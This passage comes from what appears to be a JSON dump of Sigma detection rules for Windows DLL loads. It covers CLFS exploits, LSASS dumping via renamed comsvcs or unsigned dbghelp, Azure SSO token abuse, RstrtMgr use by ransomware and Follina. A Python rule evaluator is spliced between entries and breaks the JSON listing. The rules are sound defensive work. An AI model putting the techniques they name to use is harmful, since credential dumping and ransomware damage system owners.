'.xls'\n            - '.xlsx'\n        TargetFilename|contains:\n            - '.doc.'\n            - '.docx.'\n            - '.jpeg.'\n            - '.jpg.'\n            - '.lnk.'\n            - '.pdf.'\n            - '.png.'\n            - '.pst.'\n            - '.rtf.'\n            - '.xls.'\n            - '.xlsx.'\n    filter_main_generic:\n        TargetFilename|endswith:\n            # Note: Please add more used extensions by backup or recovery software\n            - '.backup'\n            - '.bak'\n            - '.old'\n            - '.orig'\n            - '.temp'\n            - '.tmp'\n    filter_optional_anaconda:\n        TargetFilename|contains: ':\\ProgramData\\Anaconda3\\'\n        TargetFilename|endswith: '.c~'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Backup software\nlevel: medium\n"
  },
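To make the condition logic of the webshell-creation rule above (`all of selection_wwwroot_* or all of selection_htdocs_*`, minus the `filter_main_*` exclusions) and of the appended-extension rename rule (`selection and not 1 of filter_main_* and not 1 of filter_optional_*`) concrete, here is a toy evaluator for the handful of Sigma modifiers those two rules use, run over constructed sample events. This is added illustration code, not pysigma or any Sigma backend the project uses; the detection blocks are transcribed from the YAML above, the events are made up, and each rule's condition is written as a Python callable rather than parsed from the `condition` string.

```python
import re
from typing import Any, Dict, List


def _field_matches(value: str, modifiers: List[str], patterns: Any) -> bool:
    """Apply one Sigma modifier chain (e.g. contains|all) to one event value.
    Sigma string comparisons are case-insensitive and |re is an unanchored search."""
    pats = patterns if isinstance(patterns, list) else [patterns]
    mods = set(modifiers)
    if "re" in mods:
        test = lambda p: re.search(p, value) is not None
    elif "startswith" in mods:
        test = lambda p: value.lower().startswith(str(p).lower())
    elif "endswith" in mods:
        test = lambda p: value.lower().endswith(str(p).lower())
    elif "contains" in mods:
        test = lambda p: str(p).lower() in value.lower()
    else:  # plain value: case-insensitive equality
        test = lambda p: value.lower() == str(p).lower()
    # A list of values is OR-ed, unless |all is present, which makes it AND.
    return all(map(test, pats)) if "all" in mods else any(map(test, pats))


def selection_matches(event: Dict[str, Any], selection: Any) -> bool:
    """A map ANDs its fields; a list of maps ORs its entries; a missing field never matches."""
    if isinstance(selection, list):
        return any(selection_matches(event, s) for s in selection)
    for key, patterns in selection.items():
        field, *mods = key.split("|")
        if field not in event or not _field_matches(str(event[field]), mods, patterns):
            return False
    return True


def evaluate(rule: Dict[str, Any], event: Dict[str, Any]) -> bool:
    """Evaluate a rule whose condition is a callable over (named, one_of, all_of) helpers."""
    det = rule["detection"]
    named = lambda name: selection_matches(event, det[name])
    one_of = lambda prefix: any(named(n) for n in det if n.startswith(prefix))
    all_of = lambda prefix: all(named(n) for n in det if n.startswith(prefix))
    return rule["condition"](named, one_of, all_of)


DOC_EXTS = [".doc", ".docx", ".jpeg", ".jpg", ".lnk", ".pdf", ".png", ".pst", ".rtf", ".xls", ".xlsx"]

# "Suspicious Appended Extension" (file_rename), transcribed from the rule above.
RANSOMWARE_RENAME = {
    "detection": {
        "selection": {
            "SourceFilename|endswith": DOC_EXTS,
            "TargetFilename|contains": [ext + "." for ext in DOC_EXTS],
        },
        "filter_main_generic": {"TargetFilename|endswith": [".backup", ".bak", ".old", ".orig", ".temp", ".tmp"]},
        "filter_optional_anaconda": {
            "TargetFilename|contains": ":\\ProgramData\\Anaconda3\\",
            "TargetFilename|endswith": ".c~",
        },
    },
    # condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
    "condition": lambda m, one_of, all_of: m("selection") and not one_of("filter_main_") and not one_of("filter_optional_"),
}

# "Potential Webshell Creation On Static Website" (file_event), transcribed from the rule above.
WEBSHELL_CREATION = {
    "detection": {
        "selection_wwwroot_path": {"TargetFilename|contains": "\\inetpub\\wwwroot\\"},
        "selection_wwwroot_ext": {"TargetFilename|contains": [".ashx", ".asp", ".ph", ".soap"]},
        "selection_htdocs_path": {"TargetFilename|contains": ["\\www\\", "\\htdocs\\", "\\html\\"]},
        "selection_htdocs_ext": {"TargetFilename|contains": ".ph"},
        "filter_main_temp": {"TargetFilename|contains": ["\\AppData\\Local\\Temp\\", "\\Windows\\Temp\\"]},
        "filter_main_system": {"Image": "System"},
        "filter_main_legitimate": {"TargetFilename|contains": "\\xampp"},
    },
    # condition: (all of selection_wwwroot_* or all of selection_htdocs_*) and not 1 of filter_main_*
    "condition": lambda m, one_of, all_of: (all_of("selection_wwwroot_") or all_of("selection_htdocs_")) and not one_of("filter_main_"),
}

# Constructed sample events, not real telemetry.
RENAME_EVENTS = [
    {"SourceFilename": "C:\\Users\\alice\\Documents\\report.docx", "TargetFilename": "C:\\Users\\alice\\Documents\\report.docx.locky"},
    {"SourceFilename": "C:\\Users\\alice\\Documents\\report.docx", "TargetFilename": "C:\\Users\\alice\\Documents\\report.docx.bak"},
    {"SourceFilename": "C:\\ProgramData\\Anaconda3\\pkgs\\logo.png", "TargetFilename": "C:\\ProgramData\\Anaconda3\\pkgs\\logo.png.c~"},
    {"SourceFilename": "C:\\Users\\alice\\Pictures\\cat.jpg", "TargetFilename": "C:\\Users\\alice\\Pictures\\cat.jpg.encrypted"},
]
FILE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "TargetFilename": "C:\\inetpub\\wwwroot\\uploads\\cmd.aspx"},
    {"Image": "System", "TargetFilename": "C:\\inetpub\\wwwroot\\default.asp"},
    {"Image": "C:\\xampp\\apache\\bin\\httpd.exe", "TargetFilename": "C:\\xampp\\htdocs\\shell.php"},
    {"Image": "C:\\Apache24\\bin\\httpd.exe", "TargetFilename": "C:\\Apache24\\htdocs\\shell.php"},
    {"Image": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "TargetFilename": "C:\\inetpub\\wwwroot\\index.html"},
]


def hits(rule: Dict[str, Any], events: List[Dict[str, Any]]) -> List[str]:
    """Return the TargetFilename of every event the rule fires on."""
    return [e["TargetFilename"] for e in events if evaluate(rule, e)]


if __name__ == "__main__":
    print("rename hits:", hits(RANSOMWARE_RENAME, RENAME_EVENTS))
    print("webshell hits:", hits(WEBSHELL_CREATION, FILE_EVENTS))
```

Two details worth noticing in the output: `.aspx` fires the webshell rule because `contains: '.asp'` is a substring test, and an event with no `Image` field is not excluded by `filter_main_system`, since a filter that references a missing field simply does not match.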
  {
    "path": "rules/windows/image_load/image_load_clfs_load.yml",
    "content": "title: Clfs.SYS Loaded By Process Located In a Potentially Suspicious Location\nid: fb4e2211-6d08-426b-8e6f-0d4a161e3b1d\nstatus: experimental\ndescription: Detects Clfs.sys being loaded by a process running from a potentially suspicious location. Clfs.sys is loaded by many exploits for CVEs that target the Common Log File System (CLFS) driver.\nreferences:\n    - https://ssd-disclosure.com/ssd-advisory-common-log-file-system-clfs-driver-pe/\n    - https://x.com/Threatlabz/status/1879956781360976155\nauthor: X__Junior\ndate: 2025-01-20\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection_dll:\n        ImageLoaded|endswith: '\\clfs.sys'\n    selection_folders_1:\n        Image|contains:\n            - ':\\Perflogs\\'\n            - ':\\Users\\Public\\'\n            - '\\Temporary Internet'\n            - '\\Windows\\Temp\\'\n    selection_folders_2:\n        - Image|contains|all:\n              - ':\\Users\\'\n              - '\\Favorites\\'\n        - Image|contains|all:\n              - ':\\Users\\'\n              - '\\Favourites\\'\n        - Image|contains|all:\n              - ':\\Users\\'\n              - '\\Contacts\\'\n        - Image|contains|all:\n              - ':\\Users\\'\n              - '\\Pictures\\'\n    condition: selection_dll and 1 of selection_folders_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_cmstp_load_dll_from_susp_location.yml",
    "content": "title: DLL Loaded From Suspicious Location Via Cmstp.EXE\nid: 75e508f7-932d-4ebc-af77-269237a84ce1\nstatus: test\ndescription: Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations\nreferences:\n    - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/TTPs/Defense%20Evasion/T1218%20-%20Signed%20Binary%20Proxy%20Execution/T1218.003%20-%20CMSTP/Procedures.yaml\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-30\nmodified: 2023-02-17\ntags:\n    - attack.defense-evasion\n    - attack.t1218.003\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\cmstp.exe'\n        ImageLoaded|contains:\n            # Add more suspicious paths as you see fit in your env\n            - '\\PerfLogs\\'\n            - '\\ProgramData\\'\n            - '\\Users\\'\n            - '\\Windows\\Temp\\'\n            - 'C:\\Temp\\'\n        ImageLoaded|endswith:\n            - '.dll'\n            - '.ocx'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_amsi_suspicious_process.yml",
    "content": "title: Amsi.DLL Loaded Via LOLBIN Process\nid: 6ec86d9e-912e-4726-91a2-209359b999b9\nstatus: test\ndescription: Detects loading of \"Amsi.dll\" by a living-off-the-land (LOLBIN) process. This could be an indication of a \"PowerShell without PowerShell\" attack\nreferences:\n    - Internal Research\n    - https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-01\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\amsi.dll'\n        Image|endswith:\n            # TODO: Add more interesting processes\n            - '\\ExtExport.exe'\n            - '\\odbcconf.exe'\n            # - '\\regsvr32.exe' # legitimately calls amsi.dll\n            - '\\rundll32.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_azure_microsoft_account_token_provider_dll_load.yml",
    "content": "title: Potential Azure Browser SSO Abuse\nid: 50f852e6-af22-4c78-9ede-42ef36aa3453\nstatus: test\ndescription: |\n    Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser.\n    An attacker can use this to authenticate to Azure AD in a browser as that user.\nreferences:\n    - https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30\nauthor: Den Iuzvyk\ndate: 2020-07-15\nmodified: 2023-04-18\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded: 'C:\\Windows\\System32\\MicrosoftAccountTokenProvider.dll'\n    filter_main_bgtaskhost:\n        Image|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n        Image|endswith: '\\BackgroundTaskHost.exe'\n        # CommandLine|contains: '-ServerNameBackgroundTaskHost.WebAccountProvider'\n    filter_optional_devenv:\n        Image|startswith:\n            - 'C:\\Program Files\\Microsoft Visual Studio\\'\n            - 'C:\\Program Files (x86)\\Microsoft Visual Studio\\'\n        Image|endswith: '\\IDE\\devenv.exe'\n    filter_optional_ie:\n        Image:\n            - 'C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n            - 'C:\\Program Files\\Internet Explorer\\iexplore.exe'\n    filter_optional_edge_1:\n        - Image|startswith: 'C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\'\n        - Image|endswith: '\\WindowsApps\\MicrosoftEdge.exe'\n        - Image:\n              - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n              - 'C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe'\n    filter_optional_edge_2:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeCore\\'\n            - 'C:\\Program Files\\Microsoft\\EdgeCore\\'\n        Image|endswith:\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n    filter_optional_onedrive:\n        Image|endswith: '\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe'\n    filter_optional_null:\n        Image: null\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - False positives are expected since this rule is only looking for the DLL load event. This rule is better used in correlation with related activity\nlevel: low\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml",
    "content": "title: Suspicious Renamed Comsvcs DLL Loaded By Rundll32\nid: 8cde342c-ba48-4b74-b615-172c330f2e93\nstatus: test\ndescription: Detects rundll32 loading a renamed comsvcs.dll to dump process memory\nreferences:\n    - https://twitter.com/sbousseaden/status/1555200155351228419\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-14\nmodified: 2023-02-17\ntags:\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        Image|endswith: '\\rundll32.exe'\n        Hashes|contains:\n            # Add more hashes for other windows versions\n            - IMPHASH=eed93054cb555f3de70eaa9787f32ebb # Windows 11 21H2 x64\n            - IMPHASH=5e0dbdec1fce52daae251a110b4f309d # Windows 10 1607\n            - IMPHASH=eadbccbb324829acb5f2bbe87e5549a8 # Windows 10 1809\n            - IMPHASH=407ca0f7b523319d758a40d7c0193699 # Windows 10 2004 x64\n            - IMPHASH=281d618f4e6271e527e6386ea6f748de # Windows 10 2004 x86\n    filter:\n        ImageLoaded|endswith: '\\comsvcs.dll'\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_credui_uncommon_process_load.yml",
    "content": "title: CredUI.DLL Loaded By Uncommon Process\nid: 9ae01559-cf7e-4f8e-8e14-4c290a1b4784\nstatus: test\ndescription: Detects loading of \"credui.dll\" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of \"CredUIPromptForCredentials\" or \"CredUnPackAuthenticationBufferW\".\nreferences:\n    - https://securitydatasets.com/notebooks/atomic/windows/credential_access/SDWIN-201020013208.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password\n    - https://learn.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa\n    - https://github.com/S12cybersecurity/RDPCredentialStealer\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-10-20\nmodified: 2025-12-09\ntags:\n    - attack.credential-access\n    - attack.collection\n    - attack.t1056.002\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        - ImageLoaded|endswith:\n              - '\\credui.dll'\n              - '\\wincredui.dll'\n        - OriginalFileName:\n              - 'credui.dll'\n              - 'wincredui.dll'\n    filter_main_generic:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\SystemApps\\'\n    filter_main_full:\n        Image:\n            - 'C:\\Windows\\explorer.exe'\n            - 'C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe'\n            - 'C:\\Windows\\regedit.exe' # This FP is triggered for example when choosing the \"Connect Network Registry\" from the menu\n    filter_optional_opera:\n        Image|endswith: '\\opera_autoupdate.exe'\n    filter_optional_process_explorer:\n        Image|endswith:\n            - '\\procexp64.exe'\n            - '\\procexp.exe'\n    filter_optional_teams:\n        Image|startswith: 'C:\\Users\\'\n        Image|contains: '\\AppData\\Local\\Microsoft\\Teams\\'\n        Image|endswith: '\\Teams.exe'\n    filter_optional_onedrive:\n        Image|startswith: 'C:\\Users\\'\n        Image|contains: '\\AppData\\Local\\Microsoft\\OneDrive\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Other legitimate processes loading those DLLs in your environment.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_dbghelp_dbgcore_unsigned_load.yml",
    "content": "title: Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded\nid: bdc64095-d59a-42a2-8588-71fd9c9d9abc\nrelated:\n    - id: 0e277796-5f23-4e49-a490-483131d4f6e1 # Suspicious Loading\n      type: similar\nstatus: test\ndescription: |\n    Detects the load of an unsigned DLL named dbghelp.dll or dbgcore.dll (the libraries used to make memory dumps); the genuine Microsoft copies are signed and do not trigger this rule.\n    Tools like ProcessHacker and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\n    As an example, the SILENTTRINITY C2 framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump\n    - https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html\n    - https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6\nauthor: Perez Diego (@darkquassar), oscd.community, Ecco\ndate: 2019-10-27\nmodified: 2022-12-09\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\dbghelp.dll'\n            - '\\dbgcore.dll'\n        Signed: 'false'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_pcre_dotnet_dll_load.yml",
    "content": "title: PCRE.NET Package Image Load\nid: 84b0a8f3-680b-4096-a45b-e9a89221727c\nstatus: test\ndescription: Detects processes loading modules related to PCRE.NET package\nreferences:\n    - https://twitter.com/rbmaslen/status/1321859647091970051\n    - https://twitter.com/tifkin_/status/1321916444557365248\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-10-29\nmodified: 2022-10-09\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|contains: \\AppData\\Local\\Temp\\ba9ea7344a4a5f591d6e5dc32a13494b\\\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_rstrtmgr_suspicious_load.yml",
    "content": "title: Load Of RstrtMgr.DLL By A Suspicious Process\nid: b48492dc-c5ef-4572-8dff-32bc241c15c8\nrelated:\n    - id: 3669afd2-9891-4534-a626-e5cf03810a61\n      type: derived\nstatus: test\ndescription: |\n    Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process.\n    This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.\n    It could also be used for anti-analysis purposes by shutting down specific processes.\nreferences:\n    - https://www.crowdstrike.com/blog/windows-restart-manager-part-1/\n    - https://www.crowdstrike.com/blog/windows-restart-manager-part-2/\n    - https://web.archive.org/web/20231221193106/https://www.swascan.com/cactus-ransomware-malware-analysis/\n    - https://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data--iThome.html\nauthor: Luc Génaux\ndate: 2023-11-28\ntags:\n    - attack.impact\n    - attack.defense-evasion\n    - attack.t1486\n    - attack.t1562.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection_img:\n        - ImageLoaded|endswith: '\\RstrtMgr.dll'\n        - OriginalFileName: 'RstrtMgr.dll'\n    selection_folders_1:\n        Image|contains:\n            # Note: increase coverage by adding more suspicious paths\n            - ':\\Perflogs\\'\n            - ':\\Users\\Public\\'\n            - '\\Temporary Internet'\n    selection_folders_2:\n        - Image|contains|all:\n              - ':\\Users\\'\n              - '\\Favorites\\'\n        - Image|contains|all:\n              - ':\\Users\\'\n              - '\\Favourites\\'\n        - Image|contains|all:\n              - ':\\Users\\'\n              - '\\Contacts\\'\n    condition: selection_img and 1 of selection_folders_*\nfalsepositives:\n    - Processes related to software installation\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_rstrtmgr_uncommon_load.yml",
    "content": "title: Load Of RstrtMgr.DLL By An Uncommon Process\nid: 3669afd2-9891-4534-a626-e5cf03810a61\nrelated:\n    - id: b48492dc-c5ef-4572-8dff-32bc241c15c8\n      type: derived\nstatus: test\ndescription: |\n    Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process.\n    This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.\n    It could also be used for anti-analysis purposes by shutting down specific processes.\nreferences:\n    - https://www.crowdstrike.com/blog/windows-restart-manager-part-1/\n    - https://www.crowdstrike.com/blog/windows-restart-manager-part-2/\n    - https://web.archive.org/web/20231221193106/https://www.swascan.com/cactus-ransomware-malware-analysis/\n    - https://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data--iThome.html\nauthor: Luc Génaux\ndate: 2023-11-28\nmodified: 2025-12-08\ntags:\n    - attack.impact\n    - attack.defense-evasion\n    - attack.t1486\n    - attack.t1562.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        - ImageLoaded|endswith: '\\RstrtMgr.dll'\n        - OriginalFileName: 'RstrtMgr.dll'\n    filter_main_generic:\n        Image|startswith:\n            - 'C:\\$WINDOWS.~BT\\'\n            - 'C:\\$WinREAgent\\'\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\ProgramData\\'\n            - 'C:\\Windows\\explorer.exe'\n            - 'C:\\Windows\\SoftwareDistribution\\'\n            - 'C:\\Windows\\SysNative\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n            - 'C:\\WUDownloadCache\\'\n    filter_main_user_software_installations:\n        Image|startswith: 'C:\\Users\\'\n        Image|contains|all:\n            - '\\AppData\\Local\\Temp\\is-'\n            - '.tmp\\'\n        Image|endswith: '.tmp'\n    filter_main_admin_software_installations:\n        Image|startswith: 'C:\\Windows\\Temp\\'\n    filter_optional_onedrive:\n        Image|startswith: 'C:\\Users\\'\n        Image|endswith: '\\AppData\\Local\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Other legitimate Windows processes not currently listed\n    - Processes related to software installation\nlevel: low\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_sdiageng_load_by_msdt.yml",
    "content": "title: Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE\nid: ec8c4047-fad9-416a-8c81-0f479353d7f6\nstatus: test\ndescription: Detects both the CVE-2022-30190 (Follina) and DogWalk vulnerabilities, which exploit the msdt.exe binary to load the \"sdiageng.dll\" library\nreferences:\n    - https://www.securonix.com/blog/detecting-microsoft-msdt-dogwalk/\nauthor: Greg (rule)\ndate: 2022-06-17\nmodified: 2023-02-17\ntags:\n    - attack.defense-evasion\n    - attack.t1202\n    - cve.2022-30190\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\msdt.exe'\n        ImageLoaded|endswith: '\\sdiageng.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_system_management_automation_susp_load.yml",
    "content": "title: PowerShell Core DLL Loaded By Non PowerShell Process\nid: 092bc4b9-3d1d-43b4-a6b4-8c8acd83522f\nrelated:\n    - id: 867613fb-fa60-4497-a017-a82df74a172c\n      type: obsolete\n    - id: fe6e002f-f244-4278-9263-20e4b593827f\n      type: obsolete\nstatus: test\ndescription: |\n    Detects loading of essential DLLs used by PowerShell by a non-PowerShell process.\n    Detects behavior similar to meterpreter's \"load powershell\" extension.\nreferences:\n    - https://adsecurity.org/?p=2921\n    - https://github.com/p3nt4/PowerShdll\nauthor: Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2019-11-14\nmodified: 2025-10-07\ntags:\n    - attack.t1059.001\n    - attack.execution\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        - Description: 'System.Management.Automation'\n        - OriginalFileName: 'System.Management.Automation.dll'\n        - ImageLoaded|endswith:\n              - '\\System.Management.Automation.dll'\n              - '\\System.Management.Automation.ni.dll'\n    filter_main_powershell:\n        Image:\n            - 'C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe' # PowerShell 7 preview\n            - 'C:\\Program Files\\PowerShell\\7\\pwsh.exe' # PowerShell 7\n            - 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n            - 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n            - 'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n            - 'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'\n    filter_main_pwsh_preview:\n        Image|contains:\n            - 'C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview'\n            - '\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview'\n        Image|endswith: '\\pwsh.exe'\n    filter_main_generic:\n        Image:\n            - 'C:\\Windows\\System32\\dsac.exe'\n            - 'C:\\WINDOWS\\System32\\RemoteFXvGPUDisablement.exe'\n            - 'C:\\Windows\\System32\\runscripthelper.exe'\n            - 'C:\\WINDOWS\\System32\\sdiagnhost.exe'\n            - 'C:\\Windows\\System32\\ServerManager.exe'\n            - 'C:\\Windows\\System32\\SyncAppvPublishingServer.exe'\n            - 'C:\\Windows\\System32\\winrshost.exe'\n            - 'C:\\Windows\\System32\\wsmprovhost.exe'\n            - 'C:\\Windows\\SysWOW64\\winrshost.exe'\n            - 'C:\\Windows\\SysWOW64\\wsmprovhost.exe'\n    filter_main_dotnet:\n        Image|startswith:\n            - 'C:\\Windows\\Microsoft.NET\\Framework\\'\n            - 'C:\\Windows\\Microsoft.NET\\FrameworkArm\\'\n            - 'C:\\Windows\\Microsoft.NET\\FrameworkArm64\\'\n            - 'C:\\Windows\\Microsoft.NET\\Framework64\\'\n        Image|endswith: '\\mscorsvw.exe'\n    filter_optional_sql_server_mgmt:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft SQL Server Management Studio'\n            - 'C:\\Program Files\\Microsoft SQL Server Management Studio'\n        Image|endswith: '\\IDE\\Ssms.exe'\n    filter_optional_sql_server_tools:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft SQL Server\\'\n            - 'C:\\Program Files\\Microsoft SQL Server\\'\n        Image|endswith: '\\Tools\\Binn\\SQLPS.exe'\n    filter_optional_citrix:\n        Image|endswith: '\\Citrix\\ConfigSync\\ConfigSyncRun.exe'\n    filter_optional_vs:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft Visual Studio\\'\n            - 'C:\\Program Files\\Microsoft Visual Studio\\'\n    filter_optional_chocolatey:\n        Image|startswith: 'C:\\ProgramData\\chocolatey\\choco.exe'\n    filter_optional_nextron:\n        Image|startswith: 'C:\\Windows\\Temp\\asgard2-agent\\'\n        Image|endswith:\n            - '\\thor64.exe'\n            - '\\thor.exe'\n        # User: 'NT AUTHORITY\\SYSTEM'   # if set, matches all powershell processes not launched by SYSTEM\n    filter_optional_aurora:\n        # This filter is to avoid a race condition FP with this specific ETW provider in aurora\n        Image: null\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Used by some .NET binaries, minimal on user workstation.\n    - Used by Microsoft SQL Server Management Studio\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_tttracer_module_load.yml",
    "content": "title: Time Travel Debugging Utility Usage - Image\nid: e76c8240-d68f-4773-8880-5c6f63595aaf\nstatus: test\ndescription: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Tttracer/\n    - https://twitter.com/mattifestation/status/1196390321783025666\n    - https://twitter.com/oulusoyum/status/1191329746069655553\nauthor: 'Ensar Şamil, @sblmsrsn, @oscd_initiative'\ndate: 2020-10-06\nmodified: 2022-12-02\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.t1218\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\ttdrecord.dll'\n            - '\\ttdwriter.dll'\n            - '\\ttdloader.dll'\n    condition: selection\nfalsepositives:\n    - Legitimate usage by software developers/testers\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_unsigned_node_load.yml",
